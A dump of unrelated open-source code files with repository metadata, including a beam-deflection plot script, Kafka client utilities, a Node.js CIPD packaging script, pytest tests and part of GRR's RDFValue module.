mii = []
mii.append(0)
for i in range(1,310+2*n+1):
mii.append(mi[i]+mii[i-1])
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('$ \iint M/I\,\mathrm{d}x $ (MPa-mm)')
plt.plot(mii)
plt.savefig('m2i.pdf')
const = -mii[310+2*n]/(310+2*n)
for i in range(0,310+2*n+1):
mii[i] = (mii[i]+const*i)/E
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('Deformada (mm)')
plt.plot(mii,'-k')
plt.savefig('def.pdf')
rect1 = []
rect2 = []
for i in range(0,40):
rect1.append(-4.0824*10**(-4)*(i) - 2.4*10**-8)
rect2.append(3.12*10**(-4)*(i+357-20) - 1.1110683*10**(-1))
indx = []
for i in range(357-20,357+20):
indx.append(i)
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('Deformada (mm)')
plt.plot(mii,'-k')
plt.plot(rect1)
plt.plot(indx,rect2)
plt.savefig('ang.pdf')
flechamax = 0
posflecha = 0
for i in range(0,310+2*n+1):
flechamax = max(flechamax,abs(mii[i]))
for i in range(0,310+2*n+1):
if(abs(mii[i]) == flechamax):
posflecha = i
area = []
for i in range(0,310+2*n+1):
if i<10:
area.append(math.pi*(40/2))
continue
if i<80:
area.append((math.pi*(50/2)))
continue
if i<200+2*n:
area.append((math.pi*(((50+((i-80)*20/(120+2*n)))/2))))
continue
if i<260+2*n:
area.append((math.pi*(70/2)))
continue
if i<300+2*n:
area.append(math.pi*(60/2))
continue
area.append((math.pi*(55/2)))
esfm = 0
poses = 0
for i in range(0,310+2*n+1):
if abs(math.sqrt(area[i]/math.pi)*m[i]/I[i]) > esfm:
esfm = abs(math.sqrt(area[i]/math.pi)*m[i]/I[i])
poses = i
print(esfm, poses)
#MPa
esfm = 0
poses = 0
gresf = []
for i in range(0,310+2*n+1):
esff = abs(math.sqrt(area[i]/math.pi)*m[i]/I[i])
gresf.append(math.sqrt(esff**2 + (v[i]/area[i])**2))
if math.sqrt(esff**2 + (v[i]/area[i])**2) > esfm:
esfm = math.sqrt(esff**2 + (v[i]/area[i])**2)
poses = i
print(esfm, poses)
plt.figure(figsize=(10,5))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('Esfuerzo (MPa)')
plt.plot(gresf)
plt.savefig('esfuerzo.pdf')
| 22.920792 | 101 | 0.539957 |
ace8b5bf7c7a31f660111964509506e60980b700 | 3,680 | py | Python | py_kafk/old/kafka-python.py | liuansen/python-utils-class | 7f5371ab09b433f555f732dd35350581701e16f0 | [
"Apache-2.0"
] | 3 | 2019-05-09T08:15:29.000Z | 2021-10-12T06:24:49.000Z | py_kafk/old/kafka-python.py | liuansen/python-utils-class | 7f5371ab09b433f555f732dd35350581701e16f0 | [
"Apache-2.0"
] | 3 | 2020-03-24T06:22:02.000Z | 2021-06-10T21:28:35.000Z | py_kafk/old/kafka-python.py | liuansen/python-utils-class | 7f5371ab09b433f555f732dd35350581701e16f0 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# author๏ผAnson
# @Time : 2020/9/21 14:36
# @File : encrypt_kafka.py
from __future__ import unicode_literals
from kafka import KafkaProducer
from kafka import KafkaConsumer
from kafka.errors import KafkaError
import json
class MyEncoder(json.JSONEncoder):
def default(self, obj):
"""
ๅช่ฆๆฃๆฅๅฐไบๆฏbytes็ฑปๅ็ๆฐๆฎๅฐฑๆๅฎ่ฝฌไธบstr็ฑปๅ
:param obj:
:return:
"""
if isinstance(obj, bytes):
return str(obj, encoding='utf-8')
return json.JSONEncoder.default(self, obj)
class Kafka_producer():
'''
ไฝฟ็จkafka็็ไบงๆจกๅ
'''
def __init__(self, kafkahost,kafkaport, kafkatopic):
ssl_certfile = "../conf/certificate.pem"
ssl_cafile = "../conf/ca-root.pem"
self.kafkaHost = kafkahost
self.kafkaPort = kafkaport
self.kafkatopic = kafkatopic
self.producer = KafkaProducer(
bootstrap_servers="localhost:9092",
value_serializer=lambda v: json.dumps(v, cls=MyEncoder,indent=4).encode('utf-8'),
retries=0,
api_version = (2, 3),
request_timeout_ms=200,
ssl_check_hostname=False,
ssl_certfile=ssl_certfile,
security_protocol="SSL",
ssl_cafile=ssl_cafile
)
def sendjsondata(self, params):
try:
parmas_message = json.dumps(params)
print(parmas_message)
producer = self.producer
producer.send(self.kafkatopic, parmas_message.encode('utf-8'))
producer.flush()
except KafkaError as e:
print(e)
class Kafka_consumer():
'''
ไฝฟ็จKafkaโpython็ๆถ่ดนๆจกๅ
'''
def __init__(self, kafkahost, kafkaport, kafkatopic, groupid):
ssl_certfile = "../conf/certificate.pem"
ssl_cafile = "../conf/ca-root.pem"
self.kafkaHost = kafkahost
self.kafkaPort = kafkaport
self.kafkatopic = kafkatopic
self.groupid = groupid
self.consumer = KafkaConsumer(group_id="consumer_group_police_seemmo",
bootstrap_servers = '127.0.0.1:9092',
api_version=(2, 3),
enable_auto_commit=False,
auto_commit_interval_ms=5000,
# ssl_check_hostname=False,
# ssl_certfile=ssl_certfile,
# security_protocol="SSL",
# ssl_cafile=ssl_cafile
)
def consume_data(self):
print('123')
self.consumer.subscribe(['test'])
try:
for message in self.consumer:
print(json.loads(message.value))
except KeyboardInterrupt as e:
print(e)
if __name__ == '__main__':
'''
ๆต่ฏconsumerๅproducer
:return:
'''
# # ๆต่ฏ็ไบงๆจกๅ
# producer = Kafka_producer("127.0.0.1", 9092, "test")
# for i in range(10):
# params = '{abetst}:{null}---'+str(i)
# producer.sendjsondata(params)
# ๆต่ฏๆถ่ดนๆจกๅ
# consumer = Kafka_consumer("127.0.0.1", 9092, "test", "asklfdjsdfasdfg")
# consumer.consume_data()
# print type(self.bootstrap_servers)
consumer = KafkaConsumer(bootstrap_servers=['127.0.0.1:9092'],group_id='wm_group', auto_offset_reset='latest', enable_auto_commit=False)
consumer.subscribe(['test']) #่ฎข้
่ฆๆถ่ดน็ไธป้ข
# print consumer.topics()
# print "+++++++",consumer.position(TopicPartition(topic=u'ctripapi_duplicateddata_review', partition=1)) #่ทๅๅฝๅไธป้ข็ๆๆฐๅ็งป้
for message in consumer:
print(message.value) | 32.566372 | 140 | 0.575815 |
ace8b64d866b2494673585b178b9b9dfb1fbd84f | 4,011 | py | Python | bootstrap/cipd/doc/infra/nodejs/nodejs/build.py | xinghun61/infra | b5d4783f99461438ca9e6a477535617fadab6ba3 | [
"BSD-3-Clause"
] | 2 | 2021-04-13T21:22:18.000Z | 2021-09-07T02:11:57.000Z | bootstrap/cipd/doc/infra/nodejs/nodejs/build.py | asdfghjjklllllaaa/infra | 8f63af54e46194cd29291813f2790ff6e986804d | [
"BSD-3-Clause"
] | 21 | 2020-09-06T02:41:05.000Z | 2022-03-02T04:40:01.000Z | bootstrap/cipd/doc/infra/nodejs/nodejs/build.py | xinghun61/infra | b5d4783f99461438ca9e6a477535617fadab6ba3 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This is a simple standalone Python script to construct a CIPD package for
Node.js.
It expects CIPD to be in the path, and uses constants to determine which
sources to use to build the CIPD packages.
"""
import argparse
import collections
import contextlib
import hashlib
import io
import logging
import os
import shutil
import subprocess
import sys
import tarfile
import tempfile
import urllib.request
# The common application logger.
LOGGER = logging.getLogger('cipd-nodejs-build')
# Base package name. Platform names will be appended to this for each platform.
CIPD_PACKAGE_BASE = 'infra/nodejs/nodejs'
NodeParams = collections.namedtuple('NodeParams', ('version',))
NodePackage = collections.namedtuple('NodePackage', ('filename', 'sha256'))
# Node parameter dictionary.
NODE_PARAMS = NodeParams(
# The Node.js version.
version='10.15.3',
)
# URL template for a Node.js package.
NODE_URL_TEMPLATE = 'https://nodejs.org/dist/v%(version)s/%(filename)s'
# A map of platform to (URL, SHA256) for each supported package.
PLATFORMS = collections.OrderedDict({
'linux-amd64': NodePackage(
filename = 'node-v%(version)s-linux-x64.tar.xz',
sha256='faddbe418064baf2226c2fcbd038c3ef4ae6f936eb952a1138c7ff8cfe862438',
),
'mac-amd64': NodePackage(
filename = 'node-v%(version)s-darwin-x64.tar.gz',
sha256='7a5eaa1f69614375a695ccb62017248e5dcc15b0b8edffa7db5b52997cf992ba',
),
})
@contextlib.contextmanager
def tempdir():
tdir = tempfile.mkdtemp(prefix='tmpCIPDNode', dir=os.getcwd())
try:
yield tdir
finally:
shutil.rmtree(tdir)
def _upload_cipd_package_from(name, root):
cmd = [
'cipd', 'create',
'-name', name,
'-in', root,
'-install-mode', 'copy',
'-ref', 'latest',
'-tag', 'node_version:%s' % (NODE_PARAMS.version,),
]
LOGGER.debug('Running command: %s', cmd)
subprocess.check_call(cmd)
def _strip_extension(v):
for ext in ('.tar.gz', '.tar.xz'):
if v.endswith(ext):
return v[:-len(ext)]
return v
def _build_cipd_package(pkg_name, package):
params = NODE_PARAMS._asdict()
params.update({
'filename': package.filename % params,
})
url = NODE_URL_TEMPLATE % params
LOGGER.info('Downloading package for [%s] from: %s', pkg_name, url)
with urllib.request.urlopen(url) as conn:
data = conn.read()
# Compare hashes.
h = hashlib.sha256(data)
if h.hexdigest().lower() != package.sha256.lower():
LOGGER.error('SHA256 of package [%s] (%s) does not match expected (%s)',
url, h.hexdigest(), package.sha256)
raise ValueError('SHA256 mismatch')
basedir = _strip_extension(url.split('/')[-1])
# Unpack the file.
bio = io.BytesIO(data)
tf = tarfile.open(fileobj=bio, mode='r:*')
try:
# Our 'basedir' must be a member.
if not tf.getmember(basedir):
LOGGER.error('Package TAR does not include basedir (%s)', basedir)
raise ValueError('Unexpected TAR contents')
# Extracted whitelisted files into a temporary directory, and ship that off
# to CIPD.
with tempdir() as tdir:
basedir_whitelist = ['%s/%s/' % (basedir, dname)
for dname in ('bin', 'lib', 'include', 'share')]
for member in tf.getmembers():
for w in basedir_whitelist:
if member.name.startswith(w):
break
else:
# Not whitelisted.
continue
tf.extract(member, tdir)
# Package up our basedir.
_upload_cipd_package_from(pkg_name, os.path.join(tdir, basedir))
finally:
tf.close()
def main():
for platform, package in PLATFORMS.items():
package_name = '/'.join((CIPD_PACKAGE_BASE, platform))
_build_cipd_package(package_name, package)
return 0
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
sys.exit(main())
| 27.285714 | 80 | 0.681875 |
ace8b6b4ab26e5c787080dc0c7e7088b84b4d135 | 1,341 | py | Python | var/spack/repos/builtin/packages/unigen/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2,360 | 2017-11-06T08:47:01.000Z | 2022-03-31T14:45:33.000Z | var/spack/repos/builtin/packages/unigen/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 13,838 | 2017-11-04T07:49:45.000Z | 2022-03-31T23:38:39.000Z | var/spack/repos/builtin/packages/unigen/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1,793 | 2017-11-04T07:45:50.000Z | 2022-03-30T14:31:53.000Z | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Unigen(MakefilePackage):
"""The United Generators project was launched by the Virtual Institute 146
VI-SIM in September 2005 following a proposal of Herbert Strobele.
The goal was to facilitate comparison between various models (see below)
and/or various experiments (HADES, FOPI, CERES, NA49, CBM). The package
at present allows to convert output of various event generators to a
generic root format."""
homepage = "https://www.gsi.de/work/wissenschaftliche_netzwerke/helmholtz_virtuelle_institute/unigen.htm"
url = "https://github.com/FairRootGroup/UniGen/archive/v2.3.tar.gz"
tags = ['hep']
version('2.3', sha256='8783bcabbdf8c50dab6e93153cff9cfb267a9a9e61aef51bf1e17679ba42a717')
patch('unigen-2.3.patch', level=0)
depends_on('root', type=('build', 'link'))
def build(self, spec, prefix):
mkdirp(join_path(self.build_directory, 'lib'))
make('TOPDIR=' + self.build_directory, 'all')
def install(self, spec, prefix):
make('DESTDIR=' + prefix, 'TOPDIR=' + self.build_directory, 'install')
| 39.441176 | 110 | 0.701715 |
ace8b729f4f95f198d8dfaee97611415736dcf32 | 1,892 | py | Python | tests/test_03_param.py | celeraone/pytest-dependency | 8c69383cfb8df47467071ee10af83b60e67616c0 | [
"Apache-2.0"
] | 1 | 2018-07-17T13:35:40.000Z | 2018-07-17T13:35:40.000Z | tests/test_03_param.py | celeraone/pytest-dependency | 8c69383cfb8df47467071ee10af83b60e67616c0 | [
"Apache-2.0"
] | null | null | null | tests/test_03_param.py | celeraone/pytest-dependency | 8c69383cfb8df47467071ee10af83b60e67616c0 | [
"Apache-2.0"
] | 1 | 2018-12-01T16:52:17.000Z | 2018-12-01T16:52:17.000Z | """A scenario featuring parametrized tests.
"""
import pytest
def test_multiple(ctestdir):
ctestdir.makepyfile("""
import pytest
@pytest.mark.parametrize("x,y", [
pytest.mark.dependency(name="a1")((0,0)),
pytest.mark.dependency(name="a2")((0,1)),
pytest.mark.dependency(name="a3")((1,0)),
pytest.mark.dependency(name="a4")((1,1))
])
def test_a(x,y):
assert x==0 or y==0
@pytest.mark.parametrize("u,v", [
pytest.mark.dependency(name="b1", depends=["a1", "a2"])((1,2)),
pytest.mark.dependency(name="b2", depends=["a1", "a3"])((1,3)),
pytest.mark.dependency(name="b3", depends=["a1", "a4"])((1,4)),
pytest.mark.dependency(name="b4", depends=["a2", "a3"])((2,3)),
pytest.mark.dependency(name="b5", depends=["a2", "a4"])((2,4)),
pytest.mark.dependency(name="b6", depends=["a3", "a4"])((3,4))
])
def test_b(u,v):
pass
@pytest.mark.parametrize("w", [
pytest.mark.dependency(name="c1", depends=["b1", "b3", "b5"])(1),
pytest.mark.dependency(name="c2", depends=["b1", "b3", "b6"])(2),
pytest.mark.dependency(name="c3", depends=["b1", "b2", "b4"])(3)
])
def test_c(w):
pass
""")
result = ctestdir.runpytest("--verbose")
result.assert_outcomes(passed=7, skipped=5, failed=1)
result.stdout.fnmatch_lines("""
*::test_a?0-0? PASSED
*::test_a?0-1? PASSED
*::test_a?1-0? PASSED
*::test_a?1-1? FAILED
*::test_b?1-2? PASSED
*::test_b?1-3? PASSED
*::test_b?1-4? SKIPPED
*::test_b?2-3? PASSED
*::test_b?2-4? SKIPPED
*::test_b?3-4? SKIPPED
*::test_c?1? SKIPPED
*::test_c?2? SKIPPED
*::test_c?3? PASSED
""")
| 33.785714 | 77 | 0.512156 |
ace8b7b0f9323a5917d3798f499555a95e2d9e23 | 168 | py | Python | fl-dungeon/adventurelib/tests/localization.py | CenturionFox/fl-dungeon | f80461335b682418903b7de9333e7842057772f9 | [
"MIT"
] | null | null | null | fl-dungeon/adventurelib/tests/localization.py | CenturionFox/fl-dungeon | f80461335b682418903b7de9333e7842057772f9 | [
"MIT"
] | null | null | null | fl-dungeon/adventurelib/tests/localization.py | CenturionFox/fl-dungeon | f80461335b682418903b7de9333e7842057772f9 | [
"MIT"
] | null | null | null | import unittest
class Test_localization(unittest.TestCase):
def test_A(self):
self.fail("Not implemented")
if __name__ == '__main__':
unittest.main()
| 18.666667 | 43 | 0.696429 |
ace8b7bd8f6fd6cace6866893960703d63443a71 | 652 | py | Python | app/api/patch/patch.py | duckbytes/bloodbike-api | c6867160dd899a90aa7315125ac04e4cb71e7b79 | [
"Apache-2.0"
] | 2 | 2021-06-27T09:01:26.000Z | 2021-07-04T22:07:42.000Z | app/api/patch/patch.py | duckbytes/bloodbike-api | c6867160dd899a90aa7315125ac04e4cb71e7b79 | [
"Apache-2.0"
] | 1 | 2021-07-20T21:10:19.000Z | 2021-07-20T21:10:19.000Z | app/api/patch/patch.py | duckbytes/bloodbike-api | c6867160dd899a90aa7315125ac04e4cb71e7b79 | [
"Apache-2.0"
] | null | null | null | import flask_praetorian
from flask import jsonify
from app.api.functions.errors import internal_error
from app.api.functions.utilities import get_all_objects
from flask_restx import Resource
from app import root_ns
from app import models
from app import schemas
patches_schema = schemas.PatchSchema(many=True)
PATCH = models.Objects.PATCH
@root_ns.route('/patches', endpoint='patches_list')
class Patches(Resource):
@flask_praetorian.auth_required
def get(self):
try:
items = get_all_objects(PATCH)
except Exception as e:
return internal_error(e)
return jsonify(patches_schema.dump(items))
| 25.076923 | 55 | 0.751534 |
ace8b7c053b65e9ac493ebbbc90d4b3b6224639f | 415 | py | Python | webapp/main/migrations/0013_location_description.py | joepetrini/bike-counter | e22190d7225ee54e7327efe43861f85c49c0bbd7 | [
"MIT"
] | 5 | 2015-01-09T00:54:43.000Z | 2021-06-16T20:46:45.000Z | webapp/main/migrations/0013_location_description.py | joepetrini/bike-counter | e22190d7225ee54e7327efe43861f85c49c0bbd7 | [
"MIT"
] | 4 | 2015-06-30T12:04:22.000Z | 2017-02-08T00:11:19.000Z | webapp/main/migrations/0013_location_description.py | joepetrini/bike-counter | e22190d7225ee54e7327efe43861f85c49c0bbd7 | [
"MIT"
] | 2 | 2015-01-07T02:46:27.000Z | 2015-07-01T19:43:03.000Z | # encoding: utf8
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0012_metric_system_name'),
]
operations = [
migrations.AddField(
model_name='location',
name='description',
field=models.CharField(max_length=250, null=True, blank=True),
preserve_default=True,
),
]
| 21.842105 | 74 | 0.6 |
ace8b7cb4fc63a9556836f5a255acbed88954818 | 2,885 | py | Python | tools/det3d/datasets/pipelines/formating.py | yukke42/CenterPointTensorRT | c06ec5da881b4f44f22f9e4b67bebbd35b7d1ed3 | [
"MIT"
] | 68 | 2021-12-06T06:30:13.000Z | 2022-03-30T08:37:19.000Z | tools/det3d/datasets/pipelines/formating.py | yukke42/CenterPointTensorRT | c06ec5da881b4f44f22f9e4b67bebbd35b7d1ed3 | [
"MIT"
] | 8 | 2022-01-07T09:41:02.000Z | 2022-03-22T12:33:07.000Z | tools/det3d/datasets/pipelines/formating.py | yukke42/CenterPointTensorRT | c06ec5da881b4f44f22f9e4b67bebbd35b7d1ed3 | [
"MIT"
] | 22 | 2021-12-15T02:15:27.000Z | 2022-03-30T08:37:22.000Z | from det3d import torchie
import numpy as np
import torch
from ..registry import PIPELINES
class DataBundle(object):
def __init__(self, data):
self.data = data
@PIPELINES.register_module
class Reformat(object):
def __init__(self, **kwargs):
double_flip = kwargs.get('double_flip', False)
self.double_flip = double_flip
def __call__(self, res, info):
meta = res["metadata"]
points = res["lidar"]["points"]
voxels = res["lidar"]["voxels"]
data_bundle = dict(
metadata=meta,
points=points,
voxels=voxels["voxels"],
shape=voxels["shape"],
num_points=voxels["num_points"],
num_voxels=voxels["num_voxels"],
coordinates=voxels["coordinates"])
if res["mode"] == "train":
data_bundle.update(res["lidar"]["targets"])
elif res["mode"] == "val":
data_bundle.update(dict(metadata=meta, ))
if self.double_flip:
# y axis
yflip_points = res["lidar"]["yflip_points"]
yflip_voxels = res["lidar"]["yflip_voxels"]
yflip_data_bundle = dict(
metadata=meta,
points=yflip_points,
voxels=yflip_voxels["voxels"],
shape=yflip_voxels["shape"],
num_points=yflip_voxels["num_points"],
num_voxels=yflip_voxels["num_voxels"],
coordinates=yflip_voxels["coordinates"],)
# x axis
xflip_points = res["lidar"]["xflip_points"]
xflip_voxels = res["lidar"]["xflip_voxels"]
xflip_data_bundle = dict(
metadata=meta,
points=xflip_points,
voxels=xflip_voxels["voxels"],
shape=xflip_voxels["shape"],
num_points=xflip_voxels["num_points"],
num_voxels=xflip_voxels["num_voxels"],
coordinates=xflip_voxels["coordinates"],)
# double axis flip
double_flip_points = res["lidar"]["double_flip_points"]
double_flip_voxels = res["lidar"]["double_flip_voxels"]
double_flip_data_bundle = dict(
metadata=meta,
points=double_flip_points,
voxels=double_flip_voxels["voxels"],
shape=double_flip_voxels["shape"],
num_points=double_flip_voxels["num_points"],
num_voxels=double_flip_voxels["num_voxels"],
coordinates=double_flip_voxels["coordinates"],
)
return [data_bundle, yflip_data_bundle, xflip_data_bundle, double_flip_data_bundle], info
return data_bundle, info
| 35.182927 | 105 | 0.540381 |
ace8b8cee6c4b5b15dfbb5c9ba078d24d11a588e | 35,059 | py | Python | grr/core/grr_response_core/lib/rdfvalue.py | dekoder/grr | 27ba38dc0f5ad4f3e0cdbfb146a0a789e3b0d27b | [
"Apache-2.0"
] | 3 | 2018-09-30T01:31:29.000Z | 2019-04-22T11:44:54.000Z | grr/core/grr_response_core/lib/rdfvalue.py | tomchop/grr | 27ba38dc0f5ad4f3e0cdbfb146a0a789e3b0d27b | [
"Apache-2.0"
] | 1 | 2022-03-02T09:58:05.000Z | 2022-03-02T09:58:05.000Z | grr/core/grr_response_core/lib/rdfvalue.py | tomchop/grr | 27ba38dc0f5ad4f3e0cdbfb146a0a789e3b0d27b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""AFF4 RDFValue implementations.
This module contains all RDFValue implementations.
NOTE: This module uses the class registry to contain all implementations of
RDFValue class, regardless of where they are defined. To do this reliably, these
implementations must be imported _before_ the relevant classes are referenced
from this module.
"""
from __future__ import division
from __future__ import unicode_literals
import abc
import calendar
import collections
import datetime
import functools
import logging
import posixpath
import re
import time
import zlib
from builtins import filter # pylint: disable=redefined-builtin
import dateutil
from dateutil import parser
from future.utils import iteritems
from future.utils import with_metaclass
from past.builtins import long
from typing import cast
from grr_response_core.lib import registry
from grr_response_core.lib import utils
# Factor to convert from seconds to microseconds
MICROSECONDS = 1000000
# Somewhere to keep all the late binding placeholders.
_LATE_BINDING_STORE = {}
def RegisterLateBindingCallback(target_name, callback, **kwargs):
"""Registers a callback to be invoked when the RDFValue named is declared."""
_LATE_BINDING_STORE.setdefault(target_name, []).append((callback, kwargs))
class Error(Exception):
"""Errors generated by RDFValue parsers."""
class InitializeError(Error):
"""Raised when we can not initialize from this parameter."""
class DecodeError(InitializeError, ValueError):
"""Generated when we can not decode the data."""
def __init__(self, msg):
logging.debug(msg)
super(DecodeError, self).__init__(msg)
class RDFValueMetaclass(registry.MetaclassRegistry):
"""A metaclass for managing semantic values."""
def __init__(cls, name, bases, env_dict): # pylint: disable=no-self-argument
super(RDFValueMetaclass, cls).__init__(name, bases, env_dict)
# Run and clear any late binding callbacks registered for this class.
for callback, kwargs in _LATE_BINDING_STORE.pop(name, []):
callback(target=cls, **kwargs)
# TODO(user):pytype RDFValueMetaclass inherits MetaclassRegistry that
# inherits abc.ABCMeta, but type checker can't infer this, apparently because
# with_metaclass is used.
# pytype: disable=ignored-abstractmethod
class RDFValue(with_metaclass(RDFValueMetaclass, object)):
"""Baseclass for values.
RDFValues are serialized to and from the data store.
"""
# This is how the attribute will be serialized to the data store. It must
# indicate both the type emitted by SerializeToDataStore() and expected by
# FromDatastoreValue()
data_store_type = "bytes"
# URL pointing to a help page about this value type.
context_help_url = None
_value = None
_age = 0
# Mark as dirty each time we modify this object.
dirty = False
# If this value was created as part of an AFF4 attribute, the attribute is
# assigned here.
attribute_instance = None
def __init__(self, initializer=None, age=None):
"""Constructor must be able to take no args.
Args:
initializer: Optional parameter to construct from.
age: The age of this entry as an RDFDatetime. If not provided, create a
new instance.
Raises:
InitializeError: if we can not be initialized from this parameter.
"""
# Default timestamp is now.
if age is None:
age = RDFDatetime(age=0)
self._age = age
# Allow an RDFValue to be initialized from an identical RDFValue.
# TODO(user):pytype: type checker can't infer that the initializer
# is not None after the check below.
if initializer.__class__ == self.__class__:
self.ParseFromString(
cast(self.__class__, initializer).SerializeToString())
def Copy(self):
"""Make a new copy of this RDFValue."""
res = self.__class__()
res.ParseFromString(self.SerializeToString())
return res
def SetRaw(self, value, age=None):
self._value = value
if age is not None:
self._age = age
def __copy__(self):
return self.Copy()
@property
def age(self):
if self._age.__class__ is not RDFDatetime:
self._age = RDFDatetime(self._age, age=0)
return self._age
@age.setter
def age(self, value):
"""When assigning to this attribute it must be an RDFDatetime."""
self._age = RDFDatetime(value, age=0)
@abc.abstractmethod
def ParseFromString(self, string):
"""Given a string, parse ourselves from it."""
pass
@abc.abstractmethod
def ParseFromDatastore(self, value):
"""Initialize the RDF object from the datastore value."""
pass
@classmethod
def FromDatastoreValue(cls, value, age=None):
res = cls()
res.ParseFromDatastore(value)
if age:
res.age = age
return res
@classmethod
def FromSerializedString(cls, value, age=None):
res = cls()
res.ParseFromString(value)
if age:
res.age = age
return res
def SerializeToDataStore(self):
"""Serialize to a datastore compatible form."""
return self.SerializeToString()
@abc.abstractmethod
def SerializeToString(self):
"""Serialize into a string which can be parsed using ParseFromString."""
@classmethod
def Fields(cls):
"""Return a list of fields which can be queried from this value."""
return []
def __eq__(self, other):
return self._value == other
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self.SerializeToString())
def __bool__(self):
return bool(self._value)
def __nonzero__(self):
return bool(self._value)
def __str__(self): # pylint: disable=super-on-old-class
"""Ignores the __repr__ override below to avoid indefinite recursion."""
return super(RDFValue, self).__repr__()
def __repr__(self):
content = utils.SmartStr(self)
if len(content) > 100:
content = content[:100] + "..."
# Note %r, which prevents nasty nonascii characters from being printed,
# including dangerous terminal escape sequences.
return "<%s(%r)>" % (self.__class__.__name__, content)
class RDFPrimitive(RDFValue):
@classmethod
def FromHumanReadable(cls, string):
instance = cls()
instance.ParseFromHumanReadable(string)
return instance
@abc.abstractmethod
def ParseFromHumanReadable(self, string):
"""Initializes the object from human-readable string.
Args:
string: An `unicode` value to initialize the object from.
"""
# pytype: enable=ignored-abstractmethod
class RDFBytes(RDFPrimitive):
"""An attribute which holds bytes."""
data_store_type = "bytes"
_value = b""
def __init__(self, initializer=None, age=None):
super(RDFBytes, self).__init__(initializer=initializer, age=age)
if not self._value and initializer is not None:
self.ParseFromString(initializer)
def ParseFromString(self, string):
utils.AssertType(string, bytes)
self._value = string
def ParseFromDatastore(self, value):
utils.AssertType(value, bytes)
self._value = value
def ParseFromHumanReadable(self, string):
utils.AssertType(string, unicode)
self._value = string.encode("utf-8")
def AsBytes(self):
return self._value
def SerializeToString(self):
return self._value
def __str__(self):
return utils.SmartStr(self._value)
def __lt__(self, other):
if isinstance(other, self.__class__):
return self._value < other._value # pylint: disable=protected-access
else:
return self._value < other
def __gt__(self, other):
if isinstance(other, self.__class__):
return self._value > other._value # pylint: disable=protected-access
else:
return self._value > other
def __eq__(self, other):
if isinstance(other, self.__class__):
return self._value == other._value # pylint: disable=protected-access
else:
return self._value == other
def __len__(self):
return len(self._value)
class RDFZippedBytes(RDFBytes):
"""Zipped bytes sequence."""
def Uncompress(self):
if self:
return zlib.decompress(self._value)
else:
return ""
@functools.total_ordering
class RDFString(RDFPrimitive):
"""Represent a simple string."""
data_store_type = "string"
_value = u""
# TODO(hanuszczak): Allow initializng form arbitrary `unicode`-able object.
def __init__(self, initializer=None, age=None):
super(RDFString, self).__init__(initializer=None, age=age)
if isinstance(initializer, RDFString):
self._value = initializer._value # pylint: disable=protected-access
elif isinstance(initializer, bytes):
self.ParseFromString(initializer)
elif isinstance(initializer, unicode):
self._value = initializer
elif initializer is not None:
message = "Unexpected initializer `%s` of type `%s`"
message %= (initializer, type(initializer))
raise TypeError(message)
def format(self, *args, **kwargs): # pylint: disable=invalid-name
return self._value.format(*args, **kwargs)
def split(self, *args, **kwargs): # pylint: disable=invalid-name
return self._value.split(*args, **kwargs)
def __str__(self):
return self._value.encode("utf-8")
def __unicode__(self):
return self._value
def __getitem__(self, item):
return self._value.__getitem__(item)
def __eq__(self, other):
if isinstance(other, RDFString):
return self._value == other._value # pylint: disable=protected-access
if isinstance(other, unicode):
return self._value == other
# TODO(hanuszczak): Comparing `RDFString` and `bytes` should result in type
# error. For now we allow it because too many tests still use non-unicode
# string literals.
if isinstance(other, bytes):
return self._value.encode("utf-8") == other
message = "Unexpected value `%s` of type `%s`"
message %= (other, type(other))
raise TypeError(message)
def __lt__(self, other):
if isinstance(other, RDFString):
return self._value < other._value # pylint: disable=protected-access
if isinstance(other, unicode):
return self._value < other
# TODO(hanuszczak): Comparing `RDFString` and `bytes` should result in type
# error. For now we allow it because too many tests still use non-unicode
# string literals.
if isinstance(other, bytes):
return self._value.encode("utf-8") < other
message = "Unexpected value `%s` of type `%s`"
message %= (other, type(other))
raise TypeError(message)
def ParseFromString(self, string):
utils.AssertType(string, bytes)
self._value = string.decode("utf-8")
def ParseFromDatastore(self, value):
utils.AssertType(value, unicode)
self._value = value
def ParseFromHumanReadable(self, string):
utils.AssertType(string, unicode)
self._value = string
def SerializeToString(self):
return self._value.encode("utf-8")
def SerializeToDataStore(self):
return self._value
# TODO(hanuszczak): This class should provide custom method for parsing from
# human readable strings (and arguably should not derive from `RDFBytes` at
# all).
class HashDigest(RDFBytes):
"""Binary hash digest with hex string representation."""
data_store_type = "bytes"
def HexDigest(self):
return self._value.encode("hex")
def __str__(self):
return self._value.encode("hex")
def __eq__(self, other):
return (self._value == utils.SmartStr(other) or
self._value.encode("hex") == other)
def __ne__(self, other):
return not self.__eq__(other)
@functools.total_ordering
class RDFInteger(RDFPrimitive):
"""Represent an integer."""
data_store_type = "integer"
@staticmethod
def IsNumeric(value):
return isinstance(value, (int, long, float, RDFInteger))
def __init__(self, initializer=None, age=None):
super(RDFInteger, self).__init__(initializer=initializer, age=age)
if self._value is None:
if initializer is None:
self._value = 0
else:
self._value = int(initializer)
def SerializeToString(self):
return str(self._value)
def ParseFromString(self, string):
self._value = 0
if string:
try:
self._value = int(string)
except TypeError as e:
raise DecodeError(e)
